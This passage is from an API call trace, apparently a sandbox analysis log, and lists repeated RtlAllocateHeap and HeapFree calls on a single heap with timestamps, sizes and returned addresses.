Size=0x20) returned 0x3a5a190 [0173.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.737] HeapFree (in: 